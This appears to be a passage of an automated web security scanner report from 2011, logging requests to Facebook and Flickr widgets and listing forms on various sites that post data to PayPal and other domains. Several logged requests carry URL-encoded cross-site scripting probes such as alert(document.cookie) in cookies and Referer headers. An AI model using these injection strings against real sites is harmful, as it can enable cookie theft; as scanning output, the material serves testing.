Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252Fcustom%252Fterm%252Fhealth_beauty9c672%252522%25253E%25253Cimg%252520src%25253da%252520onerror%25253dalert%2528document.cookie%2529%25253Ebcac4069246%252F576%26extra_2%3DUS; wd=300x590

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Mon, 24 Jan 2011 22:25:01 GMT
Content-Length: 1309

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"","channel":"http:\/\/stars
...[SNIP]...
com.lb\/wp-content\/plugins\/fbconnect\/xd_receiver.htm","connect_state":2,"debug":false,"granted_perms":null,"in_facebook":true,"locale":"en_US","origin":null,"public_session_data":null,"referer_url":"http:\/\/starscene.dailystar.com.lb\/music-scenea960d\u002522\u00253E\u00253Cscript\u00253Ealert(document.cookie)\u00253C\/script\u00253Eb7d5247b69c\/2010\/11\/pianist-geoffrey-saba-performs-at-aubs-assembly-hall\/x22","session":null,"https":false};
FB.Bootstrap._requireFeatures(["Connect"], function() {
if (config.debug) {
FB.FBDebug.isEnabled = true;
FB.FBDebug.logLevel = 6;
}
FB.XdComm.Server.init("/xd_receiver_v0.4.php");
new FBIntern.LoginStatus().initialize(
config.channel,
config.session,
{ inFacebook: config.in_facebook, locale: config.locale },
config.connect_state,
config.base_domain,
config.public_session_data,
config.referer_url,
config.origin,
config.granted_perms,
config.https
);
});
</script>

Request 2

GET /extern/login_status.php?api_key=018ba7e06c4505193be6bdac2b0628d9&extern=0&channel=http%3A%2F%2Fstarscene.dailystar.com.lb%2Fwp-content%2Fplugins%2Ffbconnect%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252Fcustom%252Fterm%252Fhealth_beauty9c672%252522%25253E%25253Cimg%252520src%25253da%252520onerror%25253dalert%2528document.cookie%2529%25253Ebcac4069246%252F576%26extra_2%3DUS; wd=300x590

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Mon, 24 Jan 2011 22:25:38 GMT
Content-Length: 1094

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"","channel":"http:\/\/stars
...[SNIP]...
com.lb\/wp-content\/plugins\/fbconnect\/xd_receiver.htm","connect_state":2,"debug":false,"granted_perms":null,"in_facebook":true,"locale":"en_US","origin":null,"public_session_data":null,"referer_url":null,"session":null,"https":false};
FB.Bootstrap._requireFeatures(["Connect"], function() {
if (config.debug) {
FB.FBDebug.isEnabled = true;
FB.FBDebug.logLevel = 6;
}
FB.XdComm.Server.init("/xd_receiver_v0.4.php");
new FBIntern.LoginStatus().initialize(
config.channel,
config.session,
{ inFacebook: config.in_facebook, locale: config.locale },
config.connect_state,
config.base_domain,
config.public_session_data,
config.referer_url,
config.origin,
config.granted_perms,
config.https
);
});
</script>

18.13. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/like.php

Request 1

GET /plugins/like.php?href=http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/&layout=standard&show-faces=true&width=450&action=recommend&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252Fcustom%252Fterm%252Fhealth_beauty9c672%252522%25253E%25253Cimg%252520src%25253da%252520onerror%25253dalert%2528document.cookie%2529%25253Ebcac4069246%252F576%26extra_2%3DUS; wd=300x250

Response 1

Request 2

GET /plugins/like.php?href=http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/&layout=standard&show-faces=true&width=450&action=recommend&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252Fcustom%252Fterm%252Fhealth_beauty9c672%252522%25253E%25253Cimg%252520src%25253da%252520onerror%25253dalert%2528document.cookie%2529%25253Ebcac4069246%252F576%26extra_2%3DUS; wd=300x250

Response 2

18.14. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Request 1

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fbeirutcityguide&width=250&colorscheme=light&connections=8&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS

Response 1

Request 2

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fbeirutcityguide&width=250&colorscheme=light&connections=8&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS

Response 2

18.15. http://www.flickr.com/badge_code_v2.gne previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.flickr.com
Path:	/badge_code_v2.gne

Request 1

GET /badge_code_v2.gne?count=6&display=latest&size=s&layout=x&source=user&user=27539554%40N05 HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://blog.tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:44:59 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:44:59 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-Served-By: www45.flickr.mud.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript
Content-Length: 2168

var b_txt = '';

// write the badge


                       b_txt+= '<div class="flickr_badge_image" id="flickr_badge_image1"><a href="http://www.flickr.com/photos/favoritltd/4795392811/"><img src="http://farm5.
...[SNIP]...
<img src="http://geo.yahoo.com/p?s=792600102&t=d1dfc89598702b40d584f63b47ad0017&r=http%3A%2F%2Fblog.tweetmeme.com%2F&fl_ev=0&lang=en&intl=us" width="0" height="0" alt="" /></span>';

document.write(b_txt);

Request 2

GET /badge_code_v2.gne?count=6&display=latest&size=s&layout=x&source=user&user=27539554%40N05 HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:45:02 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:45:02 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-Served-By: www100.flickr.mud.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript
Content-Length: 2131

var b_txt = '';

// write the badge


                       b_txt+= '<div class="flickr_badge_image" id="flickr_badge_image1"><a href="http://www.flickr.com/photos/favoritltd/4795392811/"><img src="http://farm5.
...[SNIP]...
<img src="http://geo.yahoo.com/p?s=792600102&t=001dea3dd0ca065bf110eb0eb15adbcd&fl_ev=0&lang=en&intl=us" width="0" height="0" alt="" /></span>';

document.write(b_txt);

19. Cross-domain POST previous next
There are 28 instances of this issue:

http://comunidadjoomla.org/component/content/article/109-general-joomla-16x/202-joomla-16-ya-ha-llegado.html
http://flybase.org/reports/FBgn0000146.html/x22
http://joomla.pl/powiadomienia/577-joomla-16-wydany.html
http://lesterchan.net/
http://noisybox.net/computers/nzbperl/
http://venedet.michnica.net/download/donate.html
http://www.autotraderclassics.com/find/index.xhtml/x22
http://www.autotraderclassics.com/x22
http://www.barelyfitz.com/projects/tabber/
http://www.cloudaccess.net/contact-us.html
http://www.elmundo.es/
http://www.espatial.com/contact/live-trial-adwords
http://www.freebsdfoundation.org/donate/
http://www.hashemian.com/
http://www.hashemian.com/
http://www.huddletogether.com/projects/lightbox2/
http://www.joomlacommunity.eu/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html
http://www.jt.gen.tr/makaleler/46-joomla-16.html
http://www.littlewebthings.com/projects/countdown/
http://www.littlewebthings.com/projects/countdown/
http://www.littlewebthings.com/projects/countdown/
http://www.netlingo.com/advertise/payments.php
http://www.ossp.org/pkg/tool/lmtp2nntp/
http://www.outdoorphotographer.com/
http://www.outdoorphotographer.com/
http://www.outdoorphotographer.com/
http://www.playshakespeare.com/
http://www.sailinganarchy.com/advertise.htm

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

19.1. http://comunidadjoomla.org/component/content/article/109-general-joomla-16x/202-joomla-16-ya-ha-llegado.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://comunidadjoomla.org
Path:	/component/content/article/109-general-joomla-16x/202-joomla-16-ya-ha-llegado.html

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
hosted_button_id
submit

Request

Response

19.2. http://flybase.org/reports/FBgn0000146.html/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://flybase.org
Path:	/reports/FBgn0000146.html/x22

Issue detail

The page contains a form which POSTs data to the domain www.sdbonline.org. The form contains the following fields:

submit

Request

GET /reports/FBgn0000146.html/x22 HTTP/1.1
Host: flybase.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.3. http://joomla.pl/powiadomienia/577-joomla-16-wydany.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomla.pl
Path:	/powiadomienia/577-joomla-16-wydany.html

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
encrypted
submit

Request

GET /powiadomienia/577-joomla-16-wydany.html HTTP/1.1
Host: joomla.pl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.4. http://lesterchan.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lesterchan.net
Path:	/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
hosted_button_id
submit

Request

GET / HTTP/1.1
Host: lesterchan.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.5. http://noisybox.net/computers/nzbperl/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://noisybox.net
Path:	/computers/nzbperl/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
submit
encrypted

Request

GET /computers/nzbperl/ HTTP/1.1
Host: noisybox.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.6. http://venedet.michnica.net/download/donate.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://venedet.michnica.net
Path:	/download/donate.html

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
hosted_button_id
submit

Request

GET /download/donate.html HTTP/1.1
Host: venedet.michnica.net
Proxy-Connection: keep-alive
Referer: http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu?57476%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e3231f45f59c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fa5a1b42d3949309610b52593e36fa6f=5bee479ce7f93991cea282d14030843c

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:09:35 GMT
Server: Apache
Vary: Host,Accept-Encoding
Last-Modified: Wed, 12 Jan 2011 06:16:03 GMT
ETag: "992be9-1c8-499a022b5cec0"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 456

<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
<input type="hidden" name="hosted_button_id" value="36RNXGMCASXME">
<input typ
...[SNIP]...

19.7. http://www.autotraderclassics.com/find/index.xhtml/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotraderclassics.com
Path:	/find/index.xhtml/x22

Issue detail

The page contains a form which POSTs data to the domain server.iad.liveperson.net. The form contains the following fields:

cmd
surveyname
udename!survey1876075
udename!name
udename!survey1876071
udename!survey1876072
udename!tkt_email
udename!survey1876073
udename!survey1876073
udename!survey1876073
udename!survey1876073
udename!survey1876073
udename!subject
udename!survey1876074
udename!survey1876074
udename!survey1876074
udename!survey1876074
Submit

Request

GET /find/index.xhtml/x22 HTTP/1.1
Host: www.autotraderclassics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sat, 15 Jan 2011 12:37:21 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Date: Mon, 24 Jan 2011 16:04:30 GMT
Content-Length: 19116
Connection: close
Set-Cookie: v1st=AD90949C1AABB6BF; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotraderclassics.com
Set-Cookie: ATC_ID=216.66.31.240.1295885070163888; path=/; expires=Sat, 03-Jan-15 16:04:30 GMT; domain=.autotraderclassics.com
Set-Cookie: BIGipServerwww.autotraderclassics.com=3985170442.14360.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<script type='text/ja
...[SNIP]...
<div id="feedbackModalModal" class="atx-modal-content" style="display: none">

<form method="POST" id="message" name="message" class="user-form"
action="http://server.iad.liveperson.net/hc/s-86335200/web/ticketpub/msgController.jsp"
enctype="multipart/form-data" onsubmit="return validateFeedback('message')">

<div class="column-group feedback clearfix">
...[SNIP]...

19.8. http://www.autotraderclassics.com/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotraderclassics.com
Path:	/x22

Issue detail

The page contains a form which POSTs data to the domain server.iad.liveperson.net. The form contains the following fields:

cmd
surveyname
udename!survey1876075
udename!name
udename!survey1876071
udename!survey1876072
udename!tkt_email
udename!survey1876073
udename!survey1876073
udename!survey1876073
udename!survey1876073
udename!survey1876073
udename!subject
udename!survey1876074
udename!survey1876074
udename!survey1876074
udename!survey1876074
Submit

Request

GET /x22 HTTP/1.1
Host: www.autotraderclassics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sat, 15 Jan 2011 12:37:21 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Date: Mon, 24 Jan 2011 16:04:29 GMT
Content-Length: 19116
Connection: close
Set-Cookie: v1st=38C713FCEE18F8B0; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotraderclassics.com
Set-Cookie: ATC_ID=216.66.31.238.1295885069167883; path=/; expires=Sat, 03-Jan-15 16:04:29 GMT; domain=.autotraderclassics.com
Set-Cookie: BIGipServerwww.autotraderclassics.com=4203274250.14360.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<script type='text/ja
...[SNIP]...
<div id="feedbackModalModal" class="atx-modal-content" style="display: none">

<form method="POST" id="message" name="message" class="user-form"
action="http://server.iad.liveperson.net/hc/s-86335200/web/ticketpub/msgController.jsp"
enctype="multipart/form-data" onsubmit="return validateFeedback('message')">

<div class="column-group feedback clearfix">
...[SNIP]...

19.9. http://www.barelyfitz.com/projects/tabber/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.barelyfitz.com
Path:	/projects/tabber/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
business
item_name
item_number
image_url
no_shipping
cn
currency_code
tax
submit

Request

GET /projects/tabber/ HTTP/1.1
Host: www.barelyfitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:24:24 GMT
Server: Apache
X-Powered-By: PHP/4.4.1
Connection: close
Content-Type: text/html
Content-Length: 14750

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML LANG="en">
<HEAD>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859
...[SNIP]...
<DIV STYLE="padding:4px;background:#ccd">
Support future development!

<form action="https://www.paypal.com/cgi-bin/webscr" method="post" style="text-align:center;margin:0px;padding:0px;">
<input type="hidden" name="cmd" value="_xclick">
...[SNIP]...

19.10. http://www.cloudaccess.net/contact-us.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/contact-us.html

Issue detail

The page contains a form which POSTs data to the domain cloudaccess.infusionsoft.com. The form contains the following fields:

infusion_xid
infusion_type
infusion_name
Contact0FirstName
Contact0LastName
Contact0Company
Contact0Email
Contact0Phone1
captcha.typed
Submit

Request

Response

19.11. http://www.elmundo.es/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.elmundo.es
Path:	/

Issue detail

The page contains a form which POSTs data to the domain buscador.elmundo.es. The form contains the following fields:

donde
donde
cadena
Submit

Request

GET / HTTP/1.1
Host: www.elmundo.es
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.12. http://www.espatial.com/contact/live-trial-adwords previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.espatial.com
Path:	/contact/live-trial-adwords

Issue detail

The page contains a form which POSTs data to the domain crm.zoho.com. The form contains the following fields:

xnQsjsdp
xmIwtLD
actionType
returnURL
First Name
Last Name
Email
Company
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Country
Lead Source
Lead Status
input
LEADCF16
LEADCF18
LEADCF19
LEADCF20
LEADCF23

Request

GET /contact/live-trial-adwords HTTP/1.1
Host: www.espatial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:05:24 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.espatial.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31392

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>Discover the power of GIS with web delivery | eSpatial GIS USA</title>
<meta name="google-site-verification"
...[SNIP]...
</p>
<form name="zohoForm" action="https://crm.zoho.com/crm/WebToLeadForm" onSubmit='return validate2();' accept-charset="UTF-8" method="POST">
<input name="xnQsjsdp" type="hidden" value="889WVNek9JY$/" />
...[SNIP]...

19.13. http://www.freebsdfoundation.org/donate/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsdfoundation.org
Path:	/donate/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
business
item_name
no_shipping
cn
return
cancel_return
currency_code
tax
bn
submit

Request

GET /donate/ HTTP/1.1
Host: www.freebsdfoundation.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:39:40 GMT
Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 10624

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-
...[SNIP]...
<br />

<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<p>
...[SNIP]...

19.14. http://www.hashemian.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hashemian.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain rover.ebay.com. The form contains the following fields:

MfcISAPICommand
ht
SortProperty
ebaytag1
query
submit
ebaytag1

Request

GET / HTTP/1.1
Host: www.hashemian.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.15. http://www.hashemian.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hashemian.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
business
item_name
no_shipping
no_note
currency_code
tax
bn
submit

Request

GET / HTTP/1.1
Host: www.hashemian.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.16. http://www.huddletogether.com/projects/lightbox2/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huddletogether.com
Path:	/projects/lightbox2/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
business
no_note
currency_code
tax
bn
submit

Request

GET /projects/lightbox2/ HTTP/1.1
Host: www.huddletogether.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:41:07 GMT
Server: Apache
Last-Modified: Wed, 10 Mar 2010 20:38:11 GMT
ETag: "a0be022-3006-4817846d0f2c0"
Accept-Ranges: bytes
Content-Length: 12294
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>

   <title>Lightbox 2<
